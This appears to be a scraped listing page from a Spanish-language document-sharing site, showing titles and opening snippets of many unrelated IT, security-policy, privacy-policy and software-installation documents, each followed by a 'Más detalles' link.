PRUEBAS DE SOFTWARE TECNICAS DE PRUEBA DE SOFTWARE PRUEBAS DE SOFTWARE La prueba del software es un elemento crítico para la garantía de la calidad del software. El objetivo de la etapa de pruebas es garantizar la calidad del producto desarrollado. Además,

Más detalles

Sesión No. 4. Contextualización INFORMÁTICA 1. Nombre: Procesador de Texto

Sesión No. 4. Contextualización INFORMÁTICA 1. Nombre: Procesador de Texto INFORMÁTICA INFORMÁTICA 1 Sesión No. 4 Nombre: Procesador de Texto Contextualización La semana anterior revisamos los comandos que ofrece Word para el formato del texto, la configuración de la página,

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for SharePoint. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego

Infraestructura Tecnológica. Sesión 10: Sistemas cortafuego Infraestructura Tecnológica Sesión 10: Sistemas cortafuego Contextualización Actualmente tendemos a utilizar los sistemas de comunicación en una forma masiva, por lo que no siempre tenemos el cuidado adecuado

Más detalles

IAP 1009 - TÉCNICAS DE AUDITORÍA APOYADAS EN ORDENADOR (TAAO)

IAP 1009 - TÉCNICAS DE AUDITORÍA APOYADAS EN ORDENADOR (TAAO) IAP 1009 - TÉCNICAS DE AUDITORÍA APOYADAS EN ORDENADOR (TAAO) Introducción 1. Como se indica en la Norma Internacional de Auditoría 401, "Auditoría en un contexto informatizado", los objetivos globales

Más detalles

SISTEMAS IDEALES SISTIDE, S.A. SISTEMA GESTION DE USUARIOS

SISTEMAS IDEALES SISTIDE, S.A. SISTEMA GESTION DE USUARIOS SISTEMAS IDEALES SISTIDE, S.A. SISTEMA GESTION DE USUARIOS PÁGINA 2 SISTEMAS IDEALES SISTIDE, S.A. SISTEMA DE GESTIÓN DE USUARIOS (SGU) Hoy en día los centros de tecnología de información tienen a su cargo

Más detalles

INSTALACIÓ N A3ERP. Informática para empresas INTRODUCCIÓN CONSIDERACIONES GENERALES DE LA INSTALACIÓN PAQUETES DE INSTALACIÓN PREDEFINIDOS

INSTALACIÓ N A3ERP. Informática para empresas INTRODUCCIÓN CONSIDERACIONES GENERALES DE LA INSTALACIÓN PAQUETES DE INSTALACIÓN PREDEFINIDOS Página 1 de 20 INSTALACIÓ N A3ERP INTRODUCCIÓN La instalación de a3erp v9 ha sufrido una trasformación importante respecto a sus versiones anteriores. Cualquier instalación exige la existencia de un pc

Más detalles

GUÍA DE SEGURIDAD DE LA INFORMACIÓN GUÍA GOBIERNO CORPORATIVO PARA EMPRESAS SEP

GUÍA DE SEGURIDAD DE LA INFORMACIÓN GUÍA GOBIERNO CORPORATIVO PARA EMPRESAS SEP GUÍA DE SEGURIDAD DE LA INFORMACIÓN GUÍA GOBIERNO CORPORATIVO PARA EMPRESAS SEP 1. Introducción La información puede adoptar o estar representada en diversas formas: impresa o escrita (papeles de trabajo,

Más detalles

Internet Explorer proporciona diversas características que le ayudan a proteger su privacidad y

Internet Explorer proporciona diversas características que le ayudan a proteger su privacidad y INTERNET NIVEL MEDIO DE INTERNET MÁS SOBRE INTERNET OPCIONES DE SEGURIDAD Internet Explorer proporciona diversas características que le ayudan a proteger su privacidad y aumentan la seguridad de su equipo

Más detalles

Creación y administración de grupos de dominio

Creación y administración de grupos de dominio Creación y administración de grupos de dominio Contenido Descripción general 1 a los grupos de Windows 2000 2 Tipos y ámbitos de los grupos 5 Grupos integrados y predefinidos en un dominio 7 Estrategia

Más detalles

Guía de Obtención de Certificados para la Facturación Electrónica en Adquira Marketplace.

Guía de Obtención de Certificados para la Facturación Electrónica en Adquira Marketplace. Guía de Obtención de Certificados para la Facturación Electrónica en Adquira Marketplace. Julio 2004 Propiedad Intelectual La presente obra ha sido divulgada y editada por ADQUIRA ESPAÑA S.A. correspondiéndole

Más detalles

Sistemas de Gestión de Documentos Electrónicos de Archivo (SGDEA)

Sistemas de Gestión de Documentos Electrónicos de Archivo (SGDEA) Sistemas de Gestión de Documentos Electrónicos de Archivo (SGDEA) Agenda 1. Introducción 2. Concepto Documento Electrónico 3. A que se le denomina Documento Electrónico 4. Componentes de un Documento Electrónico

Más detalles

CORPORACIÓN MEXICANA DE INVESTIGACIÓN EN MATERIALES, S.A. DE CV

CORPORACIÓN MEXICANA DE INVESTIGACIÓN EN MATERIALES, S.A. DE CV Página 1 de 6 1. OBJETIVO El presente documento tiene la finalidad de citar los beneficios de la migración de la herramienta de análisis de riesgo, mantenimiento e inspección que en lo sucesivo se denominará

Más detalles

Guía de seguridad informática Buenas prácticas para el Nuevo Año

Guía de seguridad informática Buenas prácticas para el Nuevo Año Guía de seguridad informática Buenas prácticas para el Nuevo Año UNA VIDA DIGITAL SEGURATEC 2012 está llegando a su fin, y qué mejor manera de prepararse para el nuevo año, que tomando conciencia de las

Más detalles

Guía de instalación 1

Guía de instalación 1 Guía de instalación 1 Tabla de contenidos 1. Requisitos de software y hardware 3 2. Instalación del sistema 6 Bienvenida... 8 Archivo de licencia... del producto 9 Información de... licencia 12 Acuerdo

Más detalles

Política de Privacidad y Condiciones de Uso del Portal www.inder.gov.co

Política de Privacidad y Condiciones de Uso del Portal www.inder.gov.co Política de Privacidad y Condiciones de Uso del Portal www.inder.gov.co 1. Audiencia Esta política aplicará para todos los usuarios que hagan uso del portal del INDER Alcaldía de Medellín (www.inder.gov.co)

Más detalles

Norma de uso Identificación y autentificación Ministerio del Interior N02

Norma de uso Identificación y autentificación Ministerio del Interior N02 Norma de uso Identificación y autentificación Ministerio del Interior N02 Introducción Propósito. El acceso a la información de los sistemas del Ministerio del Interior será solo otorgado a usuarios identificados

Más detalles

PROGRAMACIÓN PÁGINAS WEB CON PHP

PROGRAMACIÓN PÁGINAS WEB CON PHP PROGRAMACIÓN PÁGINAS WEB CON PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

BBVA emarkets Seguridad

BBVA emarkets Seguridad BBVA emarkets Seguridad BBVA emarkets BBVA emarkets es un sistema para realizar operaciones mediante Internet. El sistema no requiere la instalación de software y se puede ingresar a él mediante un navegador

Más detalles

Manual de instalación de Kaspersky Internet Security

Manual de instalación de Kaspersky Internet Security Manual de instalación de Kaspersky Internet Security A continuación se describe paso a paso la descarga e instalación del antivirus KIS (Kaspersky Internet Security). DESCARGAR EL INSTALADOR Abrir el navegador

Más detalles

Elementos requeridos para crearlos (ejemplo: el compilador)

Elementos requeridos para crearlos (ejemplo: el compilador) Generalidades A lo largo del ciclo de vida del proceso de software, los productos de software evolucionan. Desde la concepción del producto y la captura de requisitos inicial hasta la puesta en producción

Más detalles

Microsoft Dynamics. Instalación de Management Reporter for Microsoft Dynamics ERP

Microsoft Dynamics. Instalación de Management Reporter for Microsoft Dynamics ERP Microsoft Dynamics Instalación de Management Reporter for Microsoft Dynamics ERP Fecha: mayo de 2010 Tabla de contenido Introducción... 3 Información general... 3 Requisitos del sistema... 3 Instalación

Más detalles

MODELOS DE GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN MADRID, 27 DE MAYO DE 2013

MODELOS DE GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN MADRID, 27 DE MAYO DE 2013 1 MODELOS DE GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN MADRID, 27 DE MAYO DE 2013 Qué es la Seguridad de la 2 Información? La información es un activo que, como otros activos importantes del negocio, tiene

Más detalles

Política de Privacidad LEVEL UP! GAMES

Política de Privacidad LEVEL UP! GAMES Política de Privacidad LEVEL UP! GAMES Level Up! Interactive S.A.S se compromete a proteger la privacidad de la información de los visitantes de nuestros entornos virtuales en línea. Esta política se aplica

Más detalles

Q-expeditive Publicación vía Internet

Q-expeditive Publicación vía Internet How to Q-expeditive Publicación vía Internet Versión: 2.0 Fecha de publicación 11-04-2011 Aplica a: Q-expeditive 3 Índice Introducción... 3 Publicación de servicios... 3 Ciudadanos... 3 Terminales de auto

Más detalles

ATAQUE Y CONTRAMEDIAS

ATAQUE Y CONTRAMEDIAS Unidad 3 4-5 3. AUTENTICACIÓN 4. CONTROL DE ACCESO 5. ATAQUE Y CONTRAMEDIAS jun-10 M.C. Gustavo A. Gutiérrez Carreón DEFINICIÓN AUTENTICACIÓN Autenticación o autentificación es el acto de establecimiento

Más detalles

CIF-KM. GUÍA DE LOS PRIMEROS PASOS

CIF-KM. GUÍA DE LOS PRIMEROS PASOS CIF-KM. GUÍA DE LOS PRIMEROS PASOS Secciones 1. CONCEPTOS PREVIOS. 2. INSTALAR CIF-KM. 2.1 Descargar e instalar CIF-KM. 2.2 Configuración de CIF-KM. 2.3 Acceso externo al servidor de CIF-KM. 3. PRIMERA

Más detalles

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos.

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Seguridad en Administración de Redes INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Administración de Seguridad en Redes La administración

Más detalles

POLÍTICA DE PRIVACIDAD DEL SITIO WEB DE KARDAMILI. Lineamientos generales

POLÍTICA DE PRIVACIDAD DEL SITIO WEB DE KARDAMILI. Lineamientos generales POLÍTICA DE PRIVACIDAD DEL SITIO WEB DE KARDAMILI Lineamientos generales Esta política de privacidad lo guiará en relación con nuestros lineamientos relacionados con el uso de su información personal,

Más detalles

I INTRODUCCIÓN. 1.1 Objetivos

I INTRODUCCIÓN. 1.1 Objetivos I INTRODUCCIÓN 1.1 Objetivos En el mundo de la informática, la auditoría no siempre es aplicada en todos las empresas, en algunos de los casos son aplicadas por ser impuestas por alguna entidad reguladora,

Más detalles

El USUARIO manifiesta que es jurídicamente capaz de realizar el procedimiento a utilizar y que está facultado para hacer uso del mismo.

El USUARIO manifiesta que es jurídicamente capaz de realizar el procedimiento a utilizar y que está facultado para hacer uso del mismo. A continuación se detallan los términos y condiciones bajo las cuales se regirá el servicio de pagos en línea del Municipio de Itagüí, para ello se proveerá la plataforma tecnológica con el fin de prestar

Más detalles

Capítulo VII PLAN DE IMPLEMENTACIÓN DE ALTO NIVEL

Capítulo VII PLAN DE IMPLEMENTACIÓN DE ALTO NIVEL Capítulo VII PLAN DE IMPLEMENTACIÓN DE ALTO NIVEL Luego de la identificación de riesgos amenazas y vulnerabilidades se pudo determinar el conjunto de actividades más importantes a ser realizadas por el

Más detalles

Ingeniería de Software. Pruebas

Ingeniería de Software. Pruebas Ingeniería de Software Pruebas Niveles de prueba Pruebas unitarias Niveles Pruebas de integración Pruebas de sistema Pruebas de aceptación Alpha Beta Niveles de pruebas Pruebas unitarias Se enfocan en

Más detalles

Estado: Aprobación Versión: 2.0 Fecha: 04/11/2009 Página 1 de 9 Documento: A5_Politica_Seguridad_V2

Estado: Aprobación Versión: 2.0 Fecha: 04/11/2009 Página 1 de 9 Documento: A5_Politica_Seguridad_V2 Estado: Aprobación Versión: 2.0 Fecha: 04/11/2009 Página 1 de 9 INDICE 1. DECLARACIÓN DE LA POLÍTICA DE SEGURIDAD DE LA INFORMACIÓN... 3 2. POLÍTICA DE SEGURIDAD... 4 2.1. OBJETIVOS... 4 2.2. ALCANCE...

Más detalles

Privacidad. <Nombre> <Institución> <e-mail>

Privacidad. <Nombre> <Institución> <e-mail> Privacidad Contenido Privacidad Riesgos principales Cuidados a tener en cuenta Fuentes Privacidad (1/3) En Internet tu privacidad puede verse expuesta: independientemente

Más detalles

Resolución Rectoral Nº 11150005-ULP-2010. ANEXO IV. Fecha Emisión Versión Revisión. ANEXO IV Resolución Rectoral Nº 11150005-ULP-2010

Resolución Rectoral Nº 11150005-ULP-2010. ANEXO IV. Fecha Emisión Versión Revisión. ANEXO IV Resolución Rectoral Nº 11150005-ULP-2010 Pág. 1 de 8 ANEXO IV Resolución Rectoral Nº 11150005-ULP-2010 TERMINOS Y CONDICIONES CON TERCEROS USUARIOS DEL INSTITUTO DE FIRMA DIGITAL DE LA PROVINCIA DE SAN LUIS Política de Certificación del Instituto

Más detalles

Autor: Microsoft Licencia: Cita Fuente: Ayuda de Windows

Autor: Microsoft Licencia: Cita Fuente: Ayuda de Windows Qué es Recuperación? Recuperación del Panel de control proporciona varias opciones que pueden ayudarle a recuperar el equipo de un error grave. Nota Antes de usar Recuperación, puede probar primero uno

Más detalles

Manual del usuario USO DEL MERCADO

Manual del usuario USO DEL MERCADO Manual del usuario USO DEL MERCADO Pagina El mercado...1 El área de trabajo...1 Colocación de sus productos...2 Encontrando ofertas y demandas...3 Haciendo y recibiendo propuestas...4 Aceptando una propuesta...5

Más detalles

Medidas de seguridad ficheros automatizados

Medidas de seguridad ficheros automatizados RECOMENDACIÓN SOBRE MEDIDAS DE SEGURIDAD A APLICAR A LOS DATOS DE CARÁCTER PERSONAL RECOGIDOS POR LOS PSICÓLOGOS Para poder tratar datos de carácter personal en una base de datos adecuándose a la Ley 15/1999,

Más detalles

REGLAMENTO DE MEDIDAS DE SEGURIDAD DE LOS FICHEROS AUTOMATIZADOS QUE CONTENGAN DATOS DE CARÁCTER PERSONAL CAPÍTULO I.- DISPOSICIONES GENERALES

REGLAMENTO DE MEDIDAS DE SEGURIDAD DE LOS FICHEROS AUTOMATIZADOS QUE CONTENGAN DATOS DE CARÁCTER PERSONAL CAPÍTULO I.- DISPOSICIONES GENERALES REGLAMENTO DE MEDIDAS DE SEGURIDAD DE LOS FICHEROS AUTOMATIZADOS QUE CONTENGAN DATOS DE CARÁCTER PERSONAL CAPÍTULO I.- DISPOSICIONES GENERALES Artículo 1.- Ámbito de aplicación y fines. El presente Reglamento

Más detalles

Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo?

Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo? Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo? Cómo hago llegar esta información confidencial a mis gerentes o clientes? Necesito un lugar donde

Más detalles

GUÍA DE USUARIO DEL CORREO

GUÍA DE USUARIO DEL CORREO REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS DIVISIÓN DE SOPORTE TÉCNICO Y FORMACIÓN AL USUARIO GUÍA DE

Más detalles